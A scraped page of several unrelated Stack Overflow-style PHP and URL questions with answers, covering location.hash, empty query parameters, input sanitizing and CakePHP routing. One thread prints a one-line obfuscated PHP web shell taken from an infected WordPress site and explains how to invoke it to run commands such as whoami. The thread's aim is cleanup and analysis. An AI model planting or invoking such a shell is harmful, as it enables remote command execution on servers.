i belive it is quite simple question.
I am making an ajax call with jquery and all that i want is to set custom hash after the call similar to this:
window.location.hash = '?url=http://www.sitename.com';
but it returns # symbol before that and i dont want it
www.mysitename.com/#?url=http://www.sitename.com
so basically how to remove that # symbol and attach a clean hash without it?
Thank you.
You cannot. If you want to set a query string (the ?something=something stuff) you have to set it (and by doing so cause a page reload) by changing location.search (only the query string) or location.href - nothing AJAXish/Web2.0ish ;)
The hash is the client-side part after the # sign and never sent to the server. It's purely meant to target page elements (for example a <h2 id="something"> is targeted by the hash #something) and nowadays to keep state information in the URL so the back/forward buttons keep working in AJAX applications (even though that'll eventually be replaced with HTML5's pushState function).
If you still want to use the hash, please do so in a google-compatible way. Basically it means you should use #!something in the hash where something could also be part of the real URL in a classical (non-AJAX) request.
The hash in a URL is, per the MDC docs:
the part of the URL that follows the # symbol, including the # symbol.
Note that the # character (which I believe is called the "pound sign" in North America) is generally called the "hash".
You want to set window.location.search instead. This is:
the part of the URL that follows the ? symbol, including the ? symbol.
Note that this triggers a reload. If you don't want this, you need to use the hash property.
Related
I extracted this from a wordpress-site, that happened to be infected and gets cleaned up by me.
<?php ($_=#$_GET[page]).#$_($_POST[404]);?>
I suspect this line to be SEO spam, but I am not able to get the meaning of this line.
It's a PHP shell. If you rewrite it to the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.
You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.
Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.
/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
PS: That was answered before here
Let's break this up a little bit:
($_=#$_GET[page]) . #$_($_POST[404]); First, this is two expressions being concatenated with the period: () . ().
In the first expression, $_ = $_GET[page], $_ is a variable, and is being assigned = to the variable $_GET['page'], or perhaps the output of an anonymous function it references. If $_GET[page] does reference an anonymous function, the # would be suppressing any errors from it.
The second expression, # $_( $_POST[404] ); is starting off with error suppression # of the anonymous function $_, which you can tell now is an anonymous function being called because it's followed by (. The argument passed to this function is $_POST['404'], and then the second parentheses just closes the call.
So I think your suspicions are correct; this looks like obfuscated code intended to look innocuous or part of the site. I suspect that the values for $_GET[page] and $_POST[404] are perhaps javascript strings whose echoing on the page would install malware or adware.
You can debug this more by looking at the values of those two variables and seeing what they are.
As best I can tell without knowing the values in GET and POST, it looks like the variable $_ is being assigned to the string $_GET[page], which would be whatever someone submits in the URL when they load the page. So, they are able to pass the string name of any function to the site and have it in PHP's scope.
Then, they are running that arbitrary function on the $_POST['404'] value. That value also is whatever the browser or user POSTs to the page.
The concatenation and outer parenthesis ().() might just be more obfuscation, or the point of this code might be to simply echo the results of this code on the page (to inject javascript) for example. But, it's also possible they are calling whatever function they want on whatever argument they've passed. I can't tell just by looking, but someone more conversant with PHP probably could.
I'm in a little argument with my boss about URLs using GET parameters without value. E.g.
http://www.example.com/?logout
I see this kind of link fairly often on the web, but of course, this doesn't mean it's a good thing. He fears that this is not standard and could lead to unexpected errors, so he'd rather like me to use something like:
http://www.example.com/?logout=yes
In my experience, I've never encountered any problem using empty parameters, and they sometimes make more sense to me (like in this case, where ?logout=no wouldn't make any sense, so the value of "logout" is irrelevant and I would only test for the presence of the parameter server-side, not for its value). (It also looks cleaner.)
However I can't find confirmation that this kind of usage is actually valid and therefore really can't cause any problem ever.
Do you have any link about this?
RFC 2396, "Uniform Resource Identifiers (URI): Generic Syntax", §3.4, "Query Component" is the authoritative source of information on the query string, and states:
The query component is a string of information to be interpreted by
the resource.
[...]
Within a query component, the characters ";", "/", "?", ":", "#",
"&", "=", "+", ",", and "$" are reserved.
RFC 2616, "Hypertext Transfer Protocol -- HTTP/1.1", §3.2.2, "http URL", does not redefine this.
In short, the query string you give ("logout") is perfectly valid.
A value is not required for the key to have any effect. It doesn't make the URL any less valid either, the URL RFC1738 does not list it as required part of the URL.
If you don't really need a value, it's just a matter of preference.
http://example.com/?logout
Is just as much a valid URL as
http://example.com/?logout=yes
All difference that it makes is that if you want to make sure that the "yes" bit was absolutely set, you can check for it's value. Like:
if(isset($_GET['logout']) && $_GET['logout'] == "yes") {
// Only proceed if the value is explicitly set to yes
If you just want to know if the logout key was set somewhere in the URL, it would suffice to just list the key with no value assigned to it. You can then check it like this:
if(isset($_GET['logout'])) {
// Continue regardless of what the value is set to (or if it's left empty)
It's perfectly fine, and won't cause any error. Though, nowadays most frameworks are MVC based, so in the URL you need to mention a controller and an action, so it looks more like /users/logout (BTW, also StackOverflow uses that URL to log users out ;).
The statement that it may cause errors to me sounds like your applications manually access the raw $_GET, and I definitely think that building apps without a framework (which usually provides an MVC stack and a router/dispatcher) is the real dangerous thing here.
Do I need to escape/sanitize the following?
$_SERVER['HTTP_USER_AGENT'] in a
PHP script (not inserted into
database or displayed to user), for
example:
if ($_SERVER['HTTP_USER_AGENT']==$xyz) {
echo "Congrats, you are using XYZ browser";
} else {
echo "You are not using XYZ browser.";
}
$_SERVER['HTTP_USER_AGENT'] when
placed as a session variable, for
example:
$_SESSION['userAgent']=$_SERVER['HTTP_USER_AGENT']
Anything that is going to be hashed,
for example:
hash('sha512',$randomDataPostedByUser)
User input destined for email body
(in other words, I've already taken
care of email header injections).
If any of the above do need to be excaped/sanitized, what is the best method for each case?
No, there is no need for sanitation in any of the examples you show, with the following very rare exception for the mail body example:
(Windows only) When PHP is talking to a SMTP server directly, if a full stop is found on the start of a line, it is removed. To counter-act this, replace these occurrences with a double dot.
However, you may need to sanitize the session variable later, depending on what you are going to do with it.
Other notes:
Your first example doesn't seem to make sense, because user agent strings vary heavily. You will have to use strstr() or regular expressions to match user agents.
Storing the user agent in a session variable might not be a good idea if you're doing comparisons - just pull it from the $_SERVER array when you need it.
I want twitter to send a user back to
site.com/person.php?person=$curr_person
where $curr_person is a session variable stored in $_SESSION['person'] and obtained from $_GET['person']
Problem is when Twitter redirects back to my site $curr_person is not evaluated and is taken literally. I assume the redirect doesn't hit my server...how can I get the call back URL to be evaluated properly?
Thanks
The reason it is not evaluated is probably because you entered it as a part of the string like that:
$twitter->call('site.com/person.php?person=$curr_person');
But there are two solutions:
Concatenate:
$twitter->call('site.com/person.php?person=' . $curr_person);
Use double quotes:
$twitter->call("site.com/person.php?person=$curr_person");
Hope this helps.
Ps. Of course I am assuming you are passing this URL to some method (like $twitter->call()), so do not just copy the code - just get familiar with the way both solutions differ from the code at the beginning of my answer.
I have an application which makes decisions based on part of URL:
if ( isset($this->params['url']['url']) ) {
$url = $this->params['url']['url'];
$url = explode('/',$url);
$id = $this->Provider->getProviderID($url[0]);
$this->providerName = $url[0]; //set the provider name
return $id;
}
This happens to be in a cake app so $this->params['url'] contains an element of URL. I then use the element of the URL so decide which data to use in the rest of my app. My question is...
whats the best way to secure this input so that people can't pass in anything nasty?
thanks,
Other comments here are correct, in AppController's beforeFilter validate the provider against the providers in your db.
However, if all URLs should be prefixed with a provider string, you are going about extracting it from the URL the wrong way by looking in $this->params['url'].
This kind of problem is exactly what the router class, and it's ability to pass params to an action is for. Check out the manual page in the cookbook http://book.cakephp.org/view/46/Routes-Configuration. You might try something like:
Router::connect('/:provider/:controller/:action');
You'll also see in the manual the ability to validate the provider param in the route itself by a regex - if you have a small definite list of known providers, you can hard code these in the route regex.
By setting up a route that captures this part of the URL it becomes instantly available in $this->params['provider'], but even better than that is the fact that the html helper link() method automatically builds correctly formatted URLs, e.g.
$html->link('label', array(
'controller' => 'xxx',
'action' => 'yyy',
'provider' => 'zzz'
));
This returns a link like /zzz/xxx/yyy
What are valid provider names? Test if the URL parameter is one, otherwise reject it.
Hopefully you're aware that there is absolutely no way to prevent the user from submitting absolutely anything, including provider names they're not supposed to use.
I'd re-iterate Karsten's comment: define "anything nasty"
What are you expecting the parameter to be? If you're expecting it to be a URL, use a regex to validate URLs. If you're expecting an integer, cast it to an integer. Same goes for a float, boolean, etc.
These PHP functions might be helpful though:
www.php.net/strip_tags
www.php.net/ctype_alpha
the parameter will be a providername - alphanumeric string. i think the answer is basically to to use ctype_alpha() in combination with a check that the providername is a valid one, based on other application logic.
thanks for the replies
Also, if you have a known set of allowable URLs, a good idea is to whitelist those allowed URLs. You could even do that dynamically by having a DB table that contains the allowed URLs -- pull that from the database, make a comparison to the URL parameter passed. Alternatively, you could whitelist patterns (say you have allowed domains that can be passed, but the rest of the url changes... You can whitelist the domain and/ or use regexps to determine validity).
At the very least, make sure you use strip_tags, or the built-in mysql escape sequences (if using PHP5, parameterizing your SQL queries solves these problems).
It would be more cake-like to use the Sanitize class. In this case Sanitize::escape() or Sanitize::paranoid() seem appropriate.